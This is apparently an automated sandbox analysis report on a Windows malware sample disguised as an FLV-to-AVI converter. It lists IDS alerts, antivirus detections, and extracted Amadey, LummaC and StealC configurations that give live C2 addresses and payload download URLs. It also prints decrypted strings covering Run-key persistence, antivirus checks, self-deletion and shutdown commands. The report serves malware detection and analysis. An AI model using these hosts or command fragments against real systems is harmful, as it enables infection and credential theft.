                            2025-02-01T16:53:43.122485+010020287653Unknown Traffic192.168.2.1153646176.113.115.96443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:53:16.593251+010020590181A Network Trojan was detected192.168.2.115353194.156.102.23980TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:51:20.695996+010020546531A Network Trojan was detected192.168.2.1149707104.21.18.116443TCP
                            2025-02-01T16:51:21.652362+010020546531A Network Trojan was detected192.168.2.1149708104.21.18.116443TCP
                            2025-02-01T16:51:31.138733+010020546531A Network Trojan was detected192.168.2.1149765104.21.18.116443TCP
                            2025-02-01T16:52:20.047505+010020546531A Network Trojan was detected192.168.2.1153469104.21.18.116443TCP
                            2025-02-01T16:52:21.157396+010020546531A Network Trojan was detected192.168.2.1153471104.21.18.116443TCP
                            2025-02-01T16:52:38.122744+010020546531A Network Trojan was detected192.168.2.1153485104.21.18.116443TCP
                            2025-02-01T16:53:31.962988+010020546531A Network Trojan was detected192.168.2.1153580172.67.139.144443TCP
                            2025-02-01T16:53:33.585498+010020546531A Network Trojan was detected192.168.2.1153591172.67.139.144443TCP
                            2025-02-01T16:53:35.896807+010020546531A Network Trojan was detected192.168.2.1153608104.21.18.116443TCP
                            2025-02-01T16:53:37.427915+010020546531A Network Trojan was detected192.168.2.1153622104.21.18.116443TCP
                            2025-02-01T16:53:47.814246+010020546531A Network Trojan was detected192.168.2.1153660172.67.139.144443TCP
                            2025-02-01T16:53:53.152709+010020546531A Network Trojan was detected192.168.2.1153666104.21.18.116443TCP
                            2025-02-01T16:53:56.332665+010020546531A Network Trojan was detected192.168.2.1153669104.21.18.116443TCP
                            2025-02-01T16:53:57.717762+010020546531A Network Trojan was detected192.168.2.1153671104.21.18.116443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:51:20.695996+010020498361A Network Trojan was detected192.168.2.1149707104.21.18.116443TCP
                            2025-02-01T16:52:20.047505+010020498361A Network Trojan was detected192.168.2.1153469104.21.18.116443TCP
                            2025-02-01T16:53:31.962988+010020498361A Network Trojan was detected192.168.2.1153580172.67.139.144443TCP
                            2025-02-01T16:53:35.896807+010020498361A Network Trojan was detected192.168.2.1153608104.21.18.116443TCP
                            2025-02-01T16:53:56.332665+010020498361A Network Trojan was detected192.168.2.1153669104.21.18.116443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:51:21.652362+010020498121A Network Trojan was detected192.168.2.1149708104.21.18.116443TCP
                            2025-02-01T16:52:21.157396+010020498121A Network Trojan was detected192.168.2.1153471104.21.18.116443TCP
                            2025-02-01T16:53:33.585498+010020498121A Network Trojan was detected192.168.2.1153591172.67.139.144443TCP
                            2025-02-01T16:53:37.427915+010020498121A Network Trojan was detected192.168.2.1153622104.21.18.116443TCP
                            2025-02-01T16:53:57.717762+010020498121A Network Trojan was detected192.168.2.1153671104.21.18.116443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:53:31.472848+010020591501Domain Observed Used for C2 Detected192.168.2.1153580172.67.139.144443TCP
                            2025-02-01T16:53:32.754479+010020591501Domain Observed Used for C2 Detected192.168.2.1153591172.67.139.144443TCP
                            2025-02-01T16:53:37.190824+010020591501Domain Observed Used for C2 Detected192.168.2.1153626172.67.139.144443TCP
                            2025-02-01T16:53:39.229553+010020591501Domain Observed Used for C2 Detected192.168.2.1153631172.67.139.144443TCP
                            2025-02-01T16:53:40.731356+010020591501Domain Observed Used for C2 Detected192.168.2.1153634172.67.139.144443TCP
                            2025-02-01T16:53:42.240219+010020591501Domain Observed Used for C2 Detected192.168.2.1153640172.67.139.144443TCP
                            2025-02-01T16:53:45.159849+010020591501Domain Observed Used for C2 Detected192.168.2.1153656172.67.139.144443TCP
                            2025-02-01T16:53:47.289857+010020591501Domain Observed Used for C2 Detected192.168.2.1153660172.67.139.144443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:14.587997+010020446961A Network Trojan was detected192.168.2.1153466185.215.113.4380TCP
                            2025-02-01T16:52:20.352535+010020446961A Network Trojan was detected192.168.2.1153470185.215.113.4380TCP
                            2025-02-01T16:52:25.177606+010020446961A Network Trojan was detected192.168.2.1153475185.215.113.4380TCP
                            2025-02-01T16:52:31.189286+010020446961A Network Trojan was detected192.168.2.1153479185.215.113.4380TCP
                            2025-02-01T16:52:36.764034+010020446961A Network Trojan was detected192.168.2.1153483185.215.113.4380TCP
                            2025-02-01T16:52:41.635076+010020446961A Network Trojan was detected192.168.2.1153487185.215.113.4380TCP
                            2025-02-01T16:52:54.920234+010020446961A Network Trojan was detected192.168.2.1153490185.215.113.4380TCP
                            2025-02-01T16:53:02.883452+010020446961A Network Trojan was detected192.168.2.1153497185.215.113.4380TCP
                            2025-02-01T16:53:13.228908+010020446961A Network Trojan was detected192.168.2.1153517185.215.113.4380TCP
                            2025-02-01T16:53:18.939349+010020446961A Network Trojan was detected192.168.2.1153534185.215.113.4380TCP
                            2025-02-01T16:53:23.451579+010020446961A Network Trojan was detected192.168.2.1153544185.215.113.4380TCP
                            2025-02-01T16:53:29.441470+010020446961A Network Trojan was detected192.168.2.1153563185.215.113.4380TCP
                            2025-02-01T16:53:36.034135+010020446961A Network Trojan was detected192.168.2.1153611185.215.113.4380TCP
                            2025-02-01T16:53:41.955829+010020446961A Network Trojan was detected192.168.2.1153636185.215.113.4380TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:31.519902+010020591891Domain Observed Used for C2 Detected192.168.2.11508291.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:31.878693+010020591911Domain Observed Used for C2 Detected192.168.2.11573441.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:31.741347+010020591991Domain Observed Used for C2 Detected192.168.2.11585741.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:31.670033+010020592011Domain Observed Used for C2 Detected192.168.2.11595671.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:31.696724+010020592031Domain Observed Used for C2 Detected192.168.2.11508081.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:53:30.920111+010020591491Domain Observed Used for C2 Detected192.168.2.11577561.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:31.782900+010020592071Domain Observed Used for C2 Detected192.168.2.11623251.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:31.808681+010020592091Domain Observed Used for C2 Detected192.168.2.11606281.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:31.639057+010020592111Domain Observed Used for C2 Detected192.168.2.11536471.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:53:02.568177+010020442471Malware Command and Control Activity Detected116.202.5.153443192.168.2.1153496TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:53:03.962444+010020518311Malware Command and Control Activity Detected116.202.5.153443192.168.2.1153498TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:53:02.567621+010020490871A Network Trojan was detected192.168.2.1153496116.202.5.153443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:53:05.610852+010020593311Malware Command and Control Activity Detected192.168.2.1153500116.202.5.153443TCP
                            2025-02-01T16:53:06.716494+010020593311Malware Command and Control Activity Detected192.168.2.1153501116.202.5.153443TCP
                            2025-02-01T16:53:15.873678+010020593311Malware Command and Control Activity Detected192.168.2.1153526116.202.5.153443TCP
                            2025-02-01T16:53:16.533821+010020593311Malware Command and Control Activity Detected192.168.2.1153530116.202.5.153443TCP
                            2025-02-01T16:53:17.511372+010020593311Malware Command and Control Activity Detected192.168.2.1153532116.202.5.153443TCP
                            2025-02-01T16:53:19.609985+010020593311Malware Command and Control Activity Detected192.168.2.1153535116.202.5.153443TCP
                            2025-02-01T16:53:21.396019+010020593311Malware Command and Control Activity Detected192.168.2.1153539116.202.5.153443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:51:23.030238+010020480941Malware Command and Control Activity Detected192.168.2.1149710104.21.18.116443TCP
                            2025-02-01T16:52:30.216233+010020480941Malware Command and Control Activity Detected192.168.2.1153478104.21.18.116443TCP
                            2025-02-01T16:53:42.496301+010020480941Malware Command and Control Activity Detected192.168.2.1153638104.21.18.116443TCP
                            2025-02-01T16:53:42.724070+010020480941Malware Command and Control Activity Detected192.168.2.1153640172.67.139.144443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:51:40.419715+010020442431Malware Command and Control Activity Detected192.168.2.1153302185.215.113.11580TCP
                            2025-02-01T16:53:42.728482+010020442431Malware Command and Control Activity Detected192.168.2.1153639185.215.113.11580TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:05.024257+010028561471A Network Trojan was detected192.168.2.1153457185.215.113.4380TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:13.866327+010028561221A Network Trojan was detected185.215.113.4380192.168.2.1153464TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:08.792543+010028033053Unknown Traffic192.168.2.115346591.240.118.49443TCP
                            2025-02-01T16:52:15.357105+010028033053Unknown Traffic192.168.2.1153467185.215.113.9780TCP
                            2025-02-01T16:52:21.091320+010028033053Unknown Traffic192.168.2.1153472185.215.113.9780TCP
                            2025-02-01T16:52:25.915108+010028033053Unknown Traffic192.168.2.1153477185.215.113.9780TCP
                            2025-02-01T16:52:31.915191+010028033053Unknown Traffic192.168.2.1153480185.215.113.9780TCP
                            2025-02-01T16:52:37.535716+010028033053Unknown Traffic192.168.2.1153486185.215.113.9780TCP
                            2025-02-01T16:52:42.866744+010028033053Unknown Traffic192.168.2.1153488185.215.113.9780TCP
                            2025-02-01T16:52:55.725282+010028033053Unknown Traffic192.168.2.1153491185.215.113.9780TCP
                            2025-02-01T16:53:03.624490+010028033053Unknown Traffic192.168.2.1153499185.215.113.9780TCP
                            2025-02-01T16:53:14.580712+010028033053Unknown Traffic192.168.2.1153520185.215.113.1680TCP
                            2025-02-01T16:53:19.794761+010028033053Unknown Traffic192.168.2.1153537185.215.113.1680TCP
                            2025-02-01T16:53:24.264409+010028033053Unknown Traffic192.168.2.1153547185.215.113.9780TCP
                            2025-02-01T16:53:30.333824+010028033053Unknown Traffic192.168.2.1153565185.215.113.1680TCP
                            2025-02-01T16:53:37.139429+010028033053Unknown Traffic192.168.2.1153623185.215.113.1680TCP
                            2025-02-01T16:53:42.730527+010028033053Unknown Traffic192.168.2.1153643185.215.113.1680TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:53:11.287192+010028032742Potentially Bad Traffic192.168.2.1153502176.113.115.96443TCP
                            2025-02-01T16:53:12.920886+010028032742Potentially Bad Traffic192.168.2.1153511176.113.115.96443TCP
                            2025-02-01T16:53:18.134053+010028032742Potentially Bad Traffic192.168.2.1153533176.113.115.96443TCP
                            2025-02-01T16:53:20.851708+010028032742Potentially Bad Traffic192.168.2.1153538176.113.115.96443TCP
                            2025-02-01T16:53:22.956384+010028032742Potentially Bad Traffic192.168.2.1153542176.113.115.96443TCP
                            2025-02-01T16:53:24.691914+010028032742Potentially Bad Traffic192.168.2.1153546176.113.115.96443TCP
                            2025-02-01T16:53:26.229965+010028032742Potentially Bad Traffic192.168.2.1153548176.113.115.96443TCP
                            2025-02-01T16:53:28.609292+010028032742Potentially Bad Traffic192.168.2.1153550176.113.115.96443TCP
                            2025-02-01T16:53:30.586118+010028032742Potentially Bad Traffic192.168.2.1153564176.113.115.96443TCP
                            2025-02-01T16:53:32.120669+010028032742Potentially Bad Traffic192.168.2.1153579176.113.115.96443TCP
                            2025-02-01T16:53:34.046609+010028032742Potentially Bad Traffic192.168.2.1153592176.113.115.96443TCP
                            2025-02-01T16:53:35.669765+010028032742Potentially Bad Traffic192.168.2.1153597176.113.115.96443TCP
                            2025-02-01T16:53:37.305266+010028032742Potentially Bad Traffic192.168.2.1153621176.113.115.96443TCP
                            2025-02-01T16:53:38.876961+010028032742Potentially Bad Traffic192.168.2.1153630176.113.115.96443TCP
                            2025-02-01T16:53:40.474554+010028032742Potentially Bad Traffic192.168.2.1153632176.113.115.96443TCP
                            2025-02-01T16:53:42.092305+010028032742Potentially Bad Traffic192.168.2.1153635176.113.115.96443TCP
                            2025-02-01T16:53:43.581693+010028032742Potentially Bad Traffic192.168.2.1153646176.113.115.96443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:53:45.163621+010028438641A Network Trojan was detected192.168.2.1153656172.67.139.144443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:53:16.533821+010028596361Malware Command and Control Activity Detected192.168.2.1153530116.202.5.153443TCP
                            2025-02-01T16:53:17.511372+010028596361Malware Command and Control Activity Detected192.168.2.1153532116.202.5.153443TCP
                            2025-02-01T16:53:19.609985+010028596361Malware Command and Control Activity Detected192.168.2.1153535116.202.5.153443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:33.272781+010028586661Domain Observed Used for C2 Detected192.168.2.1153481104.102.49.254443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:59.385091+010028593781Malware Command and Control Activity Detected192.168.2.1153494116.202.5.153443TCP

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: AApUa7VQiy.exeAvira: detected
                            Source: http://185.215.113.115/c4becf79229cb002.phphkDAvira URL Cloud: Label: malware
                            Source: http://185.215.113.115/wsAvira URL Cloud: Label: malware
                            Source: http://185.215.113.115/c4becf79229cb002.php/Avira URL Cloud: Label: malware
                            Source: http://185.215.113.16:80/steam/random.exeAvira URL Cloud: Label: malware
                            Source: http://185.215.113.97/files/initlosizz198hyjdr/random.exeAvira URL Cloud: Label: malware
                            Source: http://185.215.113.115Avira URL Cloud: Label: malware
                            Source: http://185.215.113.43/Zu7JuNko/index.phpPAvira URL Cloud: Label: malware
                            Source: http://185.215.113.97/files/c0dxnfz/random.exeAvira URL Cloud: Label: malware
                            Source: http://185.215.113.115/c4becf79229cb002.phpRsAvira URL Cloud: Label: malware
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\ktIplF5[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                            Source: ktIplF5.exe.4272.15.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://warlikedbeliev.org/api", "Build Version": "7tx2jo--659"}
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.7892.3.memstrminMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.115/c4becf79229cb002.php", "Botnet": "kira"}
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\ktIplF5[1].exeReversingLabs: Detection: 40%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exeReversingLabs: Detection: 75%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[2].exeReversingLabs: Detection: 29%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[1].exeReversingLabs: Detection: 58%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[2].exeReversingLabs: Detection: 66%
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeReversingLabs: Detection: 40%
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeReversingLabs: Detection: 58%
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeReversingLabs: Detection: 75%
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeReversingLabs: Detection: 66%
                            Source: C:\Users\user\AppData\Local\Temp\1062125001\4ee3234999.exeReversingLabs: Detection: 29%
                            Source: AApUa7VQiy.exeVirustotal: Detection: 61%Perma Link
                            Source: AApUa7VQiy.exeReversingLabs: Detection: 52%
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeJoe Sandbox ML: detected
                            Source: C:\ProgramData\Flv2AVIConverter\Flv2AVIConverter.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\ktIplF5[1].exeJoe Sandbox ML: detected
                            Source: AApUa7VQiy.exeJoe Sandbox ML: detected
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: 185.215.113.43
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: /Zu7JuNko/index.php
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: S-%lu-
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: abc3bc1985
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: skotes.exe
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: Startup
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: cmd /C RMDIR /s/q
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: rundll32
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: Programs
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: %USERPROFILE%
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: cred.dll|clip.dll|
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: cred.dll
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: clip.dll
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: http://
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: https://
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: /quiet
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: /Plugins/
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: &unit=
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: shell32.dll
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: kernel32.dll
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: GetNativeSystemInfo
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: ProgramData\
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: AVAST Software
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: Kaspersky Lab
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: Panda Security
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: Doctor Web
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: 360TotalSecurity
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: Bitdefender
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: Norton
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: Sophos
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: Comodo
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: WinDefender
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: 0123456789
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: ------
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: ?scr=1
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: ComputerName
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: -unicode-
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: VideoID
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: DefaultSettings.XResolution
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: DefaultSettings.YResolution
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: ProductName
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: CurrentBuild
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: rundll32.exe
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: "taskkill /f /im "
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: " && timeout 1 && del
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: && Exit"
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: " && ren
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: Powershell.exe
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: -executionpolicy remotesigned -File "
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: shutdown -s -t 0
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmpString decryptor: random

                            Compliance

                            barindex
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeUnpacked PE file: 12.2.flv2aviconverter24.exe.400000.0.unpack
                            Source: AApUa7VQiy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Flv to AVI Converter_is1Jump to behavior
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49707 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49708 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49710 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49719 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49727 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49742 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49750 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49765 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 91.240.118.49:443 -> 192.168.2.11:53465 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53469 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53471 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53473 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53474 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53476 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53478 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.11:53481 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53482 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53485 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.11:53502 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53608 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53622 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53638 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53650 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53653 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53657 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53663 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53666 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53669 version: TLS 1.2
